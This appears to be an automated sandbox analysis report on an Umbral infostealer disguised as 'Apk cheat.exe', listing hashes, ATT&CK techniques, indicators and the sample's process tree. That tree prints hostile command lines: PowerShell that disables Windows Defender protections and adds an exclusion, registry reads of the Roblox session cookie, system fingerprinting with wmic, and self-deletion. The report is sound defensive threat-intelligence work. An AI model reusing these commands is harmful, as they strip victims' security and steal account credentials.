umbral | a7eb41e0e607b11745a856b4148ffaa9b946abb8c859a6fd9a31508bfb164af4

Analysis

max time kernel
130s
max time network
136s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
25-02-2024 14:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Apk cheat.exe
Size

293KB
MD5

614e229e10fe41a0b4e9a6fa6f856e74
SHA1

06d61cb69492653dd0ba314d81414d9d16e72082
SHA256

a7eb41e0e607b11745a856b4148ffaa9b946abb8c859a6fd9a31508bfb164af4
SHA512

58645f3b55a6c517ce620b743405948e3c1468baa5bd7949848906d9ff26e4f6a0ab30be7f5946a80258f5e6d57714ac25a808182bb2efb6a6d9d6b1c1239569
SSDEEP

6144:WloZMCrIkd8g+EtXHkv/iD4mIjHZHMgPbu35EwFQrb8e1mbi:goZRL+EP8mIjHZHMgPbu35EwFG1

Score

10^/10

umbral spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/5016-0-0x000001481FB10000-0x000001481FB60000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Apk cheat.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	discord.com
8	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4724	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2176	PING.EXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
2204	powershell.exe
2204	powershell.exe
2204	powershell.exe
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5016	Apk cheat.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeIncreaseQuotaPrivilege	1636	powershell.exe
Token: SeSecurityPrivilege	1636	powershell.exe
Token: SeTakeOwnershipPrivilege	1636	powershell.exe
Token: SeLoadDriverPrivilege	1636	powershell.exe
Token: SeSystemProfilePrivilege	1636	powershell.exe
Token: SeSystemtimePrivilege	1636	powershell.exe
Token: SeProfSingleProcessPrivilege	1636	powershell.exe
Token: SeIncBasePriorityPrivilege	1636	powershell.exe
Token: SeCreatePagefilePrivilege	1636	powershell.exe
Token: SeBackupPrivilege	1636	powershell.exe
Token: SeRestorePrivilege	1636	powershell.exe
Token: SeShutdownPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeSystemEnvironmentPrivilege	1636	powershell.exe
Token: SeRemoteShutdownPrivilege	1636	powershell.exe
Token: SeUndockPrivilege	1636	powershell.exe
Token: SeManageVolumePrivilege	1636	powershell.exe
Token: 33	1636	powershell.exe
Token: 34	1636	powershell.exe
Token: 35	1636	powershell.exe
Token: 36	1636	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeIncreaseQuotaPrivilege	2496	wmic.exe
Token: SeSecurityPrivilege	2496	wmic.exe
Token: SeTakeOwnershipPrivilege	2496	wmic.exe
Token: SeLoadDriverPrivilege	2496	wmic.exe
Token: SeSystemProfilePrivilege	2496	wmic.exe
Token: SeSystemtimePrivilege	2496	wmic.exe
Token: SeProfSingleProcessPrivilege	2496	wmic.exe
Token: SeIncBasePriorityPrivilege	2496	wmic.exe
Token: SeCreatePagefilePrivilege	2496	wmic.exe
Token: SeBackupPrivilege	2496	wmic.exe
Token: SeRestorePrivilege	2496	wmic.exe
Token: SeShutdownPrivilege	2496	wmic.exe
Token: SeDebugPrivilege	2496	wmic.exe
Token: SeSystemEnvironmentPrivilege	2496	wmic.exe
Token: SeRemoteShutdownPrivilege	2496	wmic.exe
Token: SeUndockPrivilege	2496	wmic.exe
Token: SeManageVolumePrivilege	2496	wmic.exe
Token: 33	2496	wmic.exe
Token: 34	2496	wmic.exe
Token: 35	2496	wmic.exe
Token: 36	2496	wmic.exe
Token: SeIncreaseQuotaPrivilege	2496	wmic.exe
Token: SeSecurityPrivilege	2496	wmic.exe
Token: SeTakeOwnershipPrivilege	2496	wmic.exe
Token: SeLoadDriverPrivilege	2496	wmic.exe
Token: SeSystemProfilePrivilege	2496	wmic.exe
Token: SeSystemtimePrivilege	2496	wmic.exe
Token: SeProfSingleProcessPrivilege	2496	wmic.exe
Token: SeIncBasePriorityPrivilege	2496	wmic.exe
Token: SeCreatePagefilePrivilege	2496	wmic.exe
Token: SeBackupPrivilege	2496	wmic.exe
Token: SeRestorePrivilege	2496	wmic.exe
Token: SeShutdownPrivilege	2496	wmic.exe
Token: SeDebugPrivilege	2496	wmic.exe
Token: SeSystemEnvironmentPrivilege	2496	wmic.exe
Token: SeRemoteShutdownPrivilege	2496	wmic.exe
Token: SeUndockPrivilege	2496	wmic.exe
Token: SeManageVolumePrivilege	2496	wmic.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 5016 wrote to memory of 3948	5016	Apk cheat.exe	71
PID 5016 wrote to memory of 3948	5016	Apk cheat.exe	71
PID 5016 wrote to memory of 1636	5016	Apk cheat.exe	73
PID 5016 wrote to memory of 1636	5016	Apk cheat.exe	73
PID 5016 wrote to memory of 2164	5016	Apk cheat.exe	77
PID 5016 wrote to memory of 2164	5016	Apk cheat.exe	77
PID 5016 wrote to memory of 4480	5016	Apk cheat.exe	78
PID 5016 wrote to memory of 4480	5016	Apk cheat.exe	78
PID 5016 wrote to memory of 2204	5016	Apk cheat.exe	80
PID 5016 wrote to memory of 2204	5016	Apk cheat.exe	80
PID 5016 wrote to memory of 2496	5016	Apk cheat.exe	83
PID 5016 wrote to memory of 2496	5016	Apk cheat.exe	83
PID 5016 wrote to memory of 2748	5016	Apk cheat.exe	85
PID 5016 wrote to memory of 2748	5016	Apk cheat.exe	85
PID 5016 wrote to memory of 3064	5016	Apk cheat.exe	87
PID 5016 wrote to memory of 3064	5016	Apk cheat.exe	87
PID 5016 wrote to memory of 4348	5016	Apk cheat.exe	90
PID 5016 wrote to memory of 4348	5016	Apk cheat.exe	90
PID 5016 wrote to memory of 4724	5016	Apk cheat.exe	92
PID 5016 wrote to memory of 4724	5016	Apk cheat.exe	92
PID 5016 wrote to memory of 1152	5016	Apk cheat.exe	93
PID 5016 wrote to memory of 1152	5016	Apk cheat.exe	93
PID 1152 wrote to memory of 2176	1152	cmd.exe	94
PID 1152 wrote to memory of 2176	1152	cmd.exe	94

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3948	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Apk cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Apk cheat.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5016
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Apk cheat.exe"
  2⤵
  - Views/modifies file attributes
  PID:3948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Apk cheat.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2204
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:2748
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4348
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4724
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Apk cheat.exe" && pause
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:2176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
54162fe20b466fb64178128b9a37210f

SHA1
99ddb8a399334d84e1f836918147130eefcf6c99

SHA256
2921a6f3a968f8b0ab3b8eaabee78b432f476fe516ccb90486278ad9b2d8d016

SHA512
3017b1c7c3f8232d35173057576a85274186fc4edbb6f280aecd4854ad2e74f6b4af5d14c8bcd7b6d5d2391c7db7c969fd08582a5aaf711e256ae1d0414b2f07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c3b16ed53eef94614add973ce17209df

SHA1
300cb1c3f6f95a1290b04297090b4d0e7b263d63

SHA256
d38d4f9c58974c5ce32fc336e86ab079f7bf31b726e3786ed77f3a2f3d8fe339

SHA512
6cb914463d1a7c237cb0ca34156fc1692d096d88b972310988de3f46e2cea971a6632f27c75c8247ba6a98605889ece6ce60b4bb83cc69ec7213e69c048842a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
866101f2b3348685d83c42db8dd02fb8

SHA1
43bfda0d91f587f4f590a99ca813285de9114115

SHA256
3c168b1235a48922c727a575ebdf087430dfab5878ae3697427433237cb6f2ee

SHA512
6e47e76b9f98d89c016a141051b7bb9cf105bf2090b4a88f32c08b26b1db9da166da06394b9d7385bf3dea3d95f9fe69c1bf7094f14669fd3e17d89c75a337d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9ca44fb740e438a56c8fc30dff2acdc1

SHA1
5d6c781d6331b5fdb8a2341b5f4f973cf2f0114b

SHA256
368b34772394033dc21d0059089474fc93f9484b51baf429e203fe41b71b27ba

SHA512
7d6e16d31dd3281bdd35b3126070cc5ef2d4d108309f44ee3e39915e8e8ac4e72f0db1e0f83c6c93c01a5d9e5a635643168ab29a4018f07d1ed2cbaf384154da

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqsga21i.bzv.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/1636-53-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/1636-8-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/1636-10-0x00000244AA370000-0x00000244AA380000-memory.dmp

Filesize
64KB

Download
memory/1636-26-0x00000244AA370000-0x00000244AA380000-memory.dmp

Filesize
64KB

Download
memory/1636-49-0x00000244AA370000-0x00000244AA380000-memory.dmp

Filesize
64KB

Download
memory/1636-7-0x0000024491E40000-0x0000024491E62000-memory.dmp

Filesize
136KB

Download
memory/1636-9-0x00000244AA370000-0x00000244AA380000-memory.dmp

Filesize
64KB

Download
memory/1636-13-0x00000244AA500000-0x00000244AA576000-memory.dmp

Filesize
472KB

Download
memory/2164-63-0x000002136D2E0000-0x000002136D2F0000-memory.dmp

Filesize
64KB

Download
memory/2164-89-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/2164-60-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/2164-61-0x000002136D2E0000-0x000002136D2F0000-memory.dmp

Filesize
64KB

Download
memory/2164-86-0x000002136D2E0000-0x000002136D2F0000-memory.dmp

Filesize
64KB

Download
memory/2204-168-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/2204-136-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/2204-165-0x0000025B37200000-0x0000025B37210000-memory.dmp

Filesize
64KB

Download
memory/2204-164-0x0000025B37200000-0x0000025B37210000-memory.dmp

Filesize
64KB

Download
memory/2204-138-0x0000025B37200000-0x0000025B37210000-memory.dmp

Filesize
64KB

Download
memory/2204-137-0x0000025B37200000-0x0000025B37210000-memory.dmp

Filesize
64KB

Download
memory/4348-199-0x00000199D2940000-0x00000199D2950000-memory.dmp

Filesize
64KB

Download
memory/4348-179-0x00000199D2940000-0x00000199D2950000-memory.dmp

Filesize
64KB

Download
memory/4348-200-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/4348-178-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/4480-97-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/4480-100-0x000002119B8C0000-0x000002119B8D0000-memory.dmp

Filesize
64KB

Download
memory/4480-128-0x000002119B8C0000-0x000002119B8D0000-memory.dmp

Filesize
64KB

Download
memory/4480-127-0x000002119B8C0000-0x000002119B8D0000-memory.dmp

Filesize
64KB

Download
memory/4480-131-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/4480-99-0x000002119B8C0000-0x000002119B8D0000-memory.dmp

Filesize
64KB

Download
memory/5016-0-0x000001481FB10000-0x000001481FB60000-memory.dmp

Filesize
320KB

Download
memory/5016-126-0x000001483A0B0000-0x000001483A0C0000-memory.dmp

Filesize
64KB

Download
memory/5016-170-0x000001483A0A0000-0x000001483A0AA000-memory.dmp

Filesize
40KB

Download
memory/5016-171-0x000001483A2C0000-0x000001483A2D2000-memory.dmp

Filesize
72KB

Download
memory/5016-2-0x000001483A0B0000-0x000001483A0C0000-memory.dmp

Filesize
64KB

Download
memory/5016-93-0x000001483A080000-0x000001483A09E000-memory.dmp

Filesize
120KB

Download
memory/5016-1-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/5016-92-0x000001483A1C0000-0x000001483A210000-memory.dmp

Filesize
320KB

Download
memory/5016-85-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download
memory/5016-205-0x00007FF9B3E10000-0x00007FF9B47FC000-memory.dmp

Filesize
9.9MB

Download